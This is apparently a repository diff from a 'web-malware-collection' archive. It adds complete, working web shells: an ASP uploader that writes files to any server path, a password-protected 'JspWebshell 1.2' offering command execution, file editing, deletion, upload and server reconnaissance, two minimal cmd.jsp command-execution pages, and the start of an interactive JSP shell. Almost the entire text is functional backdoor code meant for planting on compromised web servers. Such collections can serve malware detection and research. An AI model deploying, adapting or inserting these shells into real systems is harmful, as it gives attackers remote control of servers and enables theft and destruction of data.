up.asp = File upload
by: Unknown
modified: 25/06/2003
-->
<%
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
%>
<%
Response.Buffer = true
Function BuildUpload(RequestBin)
'Get the boundary
PosBeg = 1
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
boundaryPos = InstrB(1,RequestBin,boundary)
'Get all data inside the boundaries
Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--")))
'Members variable of objects are put in a dictionary object
Dim UploadControl
Set UploadControl = CreateObject("Scripting.Dictionary")
'Get an object name
Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition"))
Pos = InstrB(Pos,RequestBin,getByteString("name="))
PosBeg = Pos+6
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename="))
PosBound = InstrB(PosEnd,RequestBin,boundary)
'Test if object is of file type
If PosFile<>0 AND (PosFile<PosBound) Then
'Get Filename, content-type and content of file
PosBeg = PosFile + 10
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
'Add filename to dictionary object
UploadControl.Add "FileName", FileName
Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:"))
PosBeg = Pos+14
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
'Add content-type to dictionary object
ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
UploadControl.Add "ContentType",ContentType
'Get content of object
PosBeg = PosEnd+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
Else
'Get content of object
Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
PosBeg = Pos+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
End If
UploadControl.Add "Value" , Value
UploadRequest.Add name, UploadControl
BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary)
Loop
End Function
%>
<%
Function getByteString(StringStr)
For i = 1 to Len(StringStr)
char = Mid(StringStr,i,1)
getByteString = getByteString & chrB(AscB(char))
Next
End Function
%>
<%
Function getString(StringBin)
getString =""
For intCount = 1 to LenB(StringBin)
getString = getString & chr(AscB(MidB(StringBin,intCount,1)))
Next
End Function
%>
<%
If request("ok")="1" then
Response.Clear
byteCount = Request.TotalBytes
RequestBin = Request.BinaryRead(byteCount)
Set UploadRequest = CreateObject("Scripting.Dictionary")
BuildUpload(RequestBin)
If UploadRequest.Item("fichero").Item("Value") <> "" Then
contentType = UploadRequest.Item("fichero").Item("ContentType")
filepathname = UploadRequest.Item("fichero").Item("FileName")
filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
value = UploadRequest.Item("fichero").Item("Value")
path = UploadRequest.Item("path").Item("Value")
filename = path & filename
Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject")
Set objFile = MyFileObject.CreateTextFile(filename)
For i = 1 to LenB(value)
objFile.Write chr(AscB(MidB(value,i,1)))
Next
objFile.Close
Set objFile = Nothing
Set MyFileObject = Nothing
End If
Set UploadRequest = Nothing
End If
%>
<HTML>
<BODY>
<FORM action="?ok=1" method="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="file" NAME="fichero">
<INPUT TYPE="submit" Value="Upload">
<br>Target PATH:<br><INPUT TYPE="text" Name="path" Value="C:\">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
File: <%=filename%>
</HTML>
</BODY>

1193
web-malware-collection-13-06-2012/ASP/zehir.asp Normal file
View file

File diff suppressed because it is too large Load diff

1190
web-malware-collection-13-06-2012/ASP/zehir.txt Normal file
View file

File diff suppressed because it is too large Load diff

1190
web-malware-collection-13-06-2012/ASP/zehir4.asp Normal file
View file

File diff suppressed because it is too large Load diff

1195
web-malware-collection-13-06-2012/ASP/zehir4.txt Normal file
View file

File diff suppressed because it is too large Load diff

788
web-malware-collection-13-06-2012/JSP/JspWebshell 1.2.jsp Normal file
View file

@ -0,0 +1,788 @@
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp网站管理</p>
*
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
* PS:本程序是小弟处于兴趣所写如有疑问请联系QQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//密码
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("文件已经存在!");
}
else
{
file.createNewFile();
result = true;
System.out.println("文件已经创建!");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("目录已经存在!");
result = true;
}
else
{
file.mkdir();
System.out.println("目录已经建立!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("目录已删除!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", "&nbsp;");
str = str.replaceAll("<", "&lt;");
str = str.replaceAll(">", "&gt;");
str = str.replaceAll("\r\n", "<br>");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>JspWebShell By 绝对零度</title>
<style>
body {
font-size: 12px;
font-family: "宋体";
background-color: #666666;
}
A {
COLOR: black; TEXT-DECORATION: none
}
A:hover {
COLOR: black; TEXT-DECORATION: underline; none:
}
td {
font-size: 12px;
font-family: "宋体";
color: #000000;
}
input.textbox {
border: black solid 1;
font-size: 12px;
height: 18px;
}
input.button {
font-size: 12px;
font-family: "宋体";
border: black solid 1;
}
td.datarows {
font-size: 12px;
font-family: "宋体";
height: 25px;
color: #000000;
}
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body bgcolor="#666666">
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
<tr>
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
<tr>
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
version 1.2管理登录 :::...</b></font></TD>
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
绝对零度</FONT></TD>
</tr>
<form name="bctform" method="post">
<tr bgcolor="#999999">
<td height="30" colspan="2" align="center" class="td2">
<input name="password" type="password" class="textbox" id="Textbox" />
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
</td>
</tr>
</form>
</TABLE></td>
</tr>
</TABLE>
</div>
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "<font color=\"red\">删除失败</font><br>\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("写入失败");}
out.print("写入成功");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
<CENTER>
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#999999" height="22">
<td width="130" bgcolor="#999999">&nbsp;服务器名</td>
<td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
<%=env.queryHashtable("sun.os.patch.level")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统类型</td>
<td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
<td>&nbsp;服务器操作系统模式</td>
<td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>位</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器所在地区</td>
<td>&nbsp;<%=env.queryHashtable("user.country")%></td>
<td>&nbsp;服务器语言</td>
<td>&nbsp;<%=env.queryHashtable("user.language")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器时区</td>
<td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
<td>&nbsp;服务器时间</td>
<td>&nbsp;<%=new java.util.Date()%> </td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器解译引擎</td>
<td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
<td width="130">&nbsp;服务器端口</td>
<td width="170">&nbsp;<%= request.getServerPort() %></td>
</tr>
<tr bgcolor="#999999" height="22">
<td height="22">&nbsp;当前用户</td>
<td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;用户目录</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td align=left>&nbsp;本文件实际路径</td>
<td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu1'>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;名称</td>
<td width="50%" height="22">&nbsp;英文名称</td>
<td width="20%" height="22">&nbsp;版本</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA运行环境说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA虚拟机说明书名称</td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
</tr>
<%
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
float fPercent=fFreeMemory/fTotalMemory*100;
%>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机剩余内存</td>
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M
</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA虚拟机分配内存</td>
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M
</td>
</tr>
</table>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;参数名称</td>
<td width="70%" height="22">&nbsp;参数路径</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.class.path </td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.home</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.endorsed.dirs</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.library.path</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.io.tmpdir</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<div id="testspeed" align="center"> </div>
</CENTER></div>
<%}
else{
if (editfile!=null)//if edit
{
%>
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
<table width="99%" height="232" border="0">
<tr>
<td height="226"><form name="form2" method="post" action="">
<p align="center"> 地址:
<input name="editfile" type="text" value="<%=editfile%>" size="50">
</p>
<p align="center">
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
<input type="submit" name="Submit2" value="保存">
</p>
</form> </td>
</tr>
</table>
<p>&nbsp;</p></div>
<%}
else{%>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
<tr bgcolor="#333333">
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
</tr>
<tr bgcolor="#999999">
<td colspan="4"> <font color="#000000">
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>)
</a>
<%}%>
</font></td>
</tr>
<tr bgcolor="#999999">
<td height="10" colspan="4"> <font color="#000000">
<form name="form1" method="post" action="">
<input type="text" name="command" class="button">
<input type="submit" name="Submit" value="CMD命令执行" class="button">
</form>
</font> <p>
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? "&nbsp;" : result%>
<%}%>
</td>
</tr>
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
<tr bgcolor="#999999">
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
<INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
</tr>
</FORM>
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
<tr bgcolor="#CCCCCC">
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
文件夹名:
<input name="dir" type="text" size="10" class="button">
<input type="submit" name="Submit3" value="新建目录" class="button">
</form></td>
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
文件名:
<input name="fileexe" type="text" size="8" class="button">
<input type="submit" name="Submit4" value="新建文件" class="button">
</form></td>
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
文件<input name="scrfile" type="text" size="15"class="button">
复制到
<input name="dstfile" type="text" size="15" class="button">
<input type="submit" name="Submit5" value="复制" class="button">
</form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
</tr>
<%//上传
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("文件创建成功!<br>");
}
catch(IOException e)
{
out.print("文件创建失败!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i<order; i++)
{
random1.read(c);
random2.write(c);
}
random1.read(c,0,left);
random2.write(c,0,left);
random1.close();
random2.close();
f1.delete();
out.print("文件上传成功!");
}
catch(Exception e)
{
out.print("文件上传失败!");
}
}
%>
<tr>
<td width="196" height="48" valign="top" bgcolor="#999999">
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isDirectory())
{%>
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
&nbsp; </td>
<td colspan="3" valign="top" bgcolor="#999999">
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isFile())
{//request.getContextPath()得到虚拟路径%>
<%=fList[j].getName()%>
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a>
&nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("不存在或没有权限");
}
%>
</td>
</tr>
</table>
<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
<p align="center">&nbsp;</p>
<%}//if edit
}
}
%>
</body>
</html>

1802
web-malware-collection-13-06-2012/JSP/browser.jsp Normal file
View file

File diff suppressed because it is too large Load diff

35
web-malware-collection-13-06-2012/JSP/cmd.jsp Normal file
View file

@ -0,0 +1,35 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

31
web-malware-collection-13-06-2012/JSP/cmd_win32.jsp Normal file
View file

@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>

352
web-malware-collection-13-06-2012/JSP/jspShell.jsp Normal file
View file

@ -0,0 +1,352 @@
<%@page contentType="text/html"%><%@page pageEncoding="UTF-8"%><%@page import="java.io.*"%><%@page import="java.io.File.*"%><%@page import="java.security.MessageDigest"%><%!
public class ProcessThread extends Thread {
private ByteArrayOutputStream progOutput = new ByteArrayOutputStream(1024);
private ByteArrayOutputStream progErrorOutput = new ByteArrayOutputStream(1024);
private BufferedWriter progIn;
private Process proc;
private InputStream inputStream;
private InputStream inputStreamErro;
private OutputStream outputStream;
public ByteArrayOutputStream getProgOutput() {
return progOutput;
}
public BufferedWriter getProgIn() {
return progIn;
}
public ByteArrayOutputStream getProgError() {
return progErrorOutput;
}
public void interrupt() {
if (proc != null) {
proc.destroy();
}
super.interrupt();
}
public void run() {
Runtime runtime = Runtime.getRuntime();
CopyThread copyThreadOut = null;
CopyThread copyThreadError = null;
try {
proc = runtime.exec("cmd");// for Windows System use runtime.exec("cmd");
inputStream = proc.getInputStream();
copyThreadOut = new CopyThread("copyThreadOut", inputStream, progOutput);
copyThreadOut.start();
inputStreamErro = proc.getErrorStream();
copyThreadError = new CopyThread("copyThreadError", inputStreamErro, progErrorOutput);
copyThreadError.start();
outputStream = proc.getOutputStream();
progIn = new BufferedWriter(new OutputStreamWriter(outputStream));
progOutput.write(("Exit=" + proc.waitFor()).getBytes());
System.out.println("Process end!!!!!!!");
} catch (InterruptedException ex) {
ex.printStackTrace();
} catch (IOException ex) {
ex.printStackTrace();
} finally {
if (copyThreadOut != null && copyThreadOut.isAlive()) {
try {
copyThreadOut.stop();
} catch (Throwable t) {
t.printStackTrace();
}
}
if (copyThreadError != null && copyThreadError.isAlive()) {
try {
copyThreadError.stop();
} catch (Throwable t) {
t.printStackTrace();
}
}
}
}
}
public class CopyThread extends Thread {
private InputStream inputStream;
private OutputStream outputStream;
private String name;
public CopyThread(String name, InputStream inputStream, OutputStream outputStream) {
this.inputStream = inputStream;
this.outputStream = outputStream;
this.name = name;
}
@Override
public void run() {
int _char;
try {
while ((_char = inputStream.read()) > 0) {
System.out.write(_char);
synchronized (outputStream) {
outputStream.write(_char);
}
}
} catch (Exception ex) {
ex.printStackTrace();
}
}
}
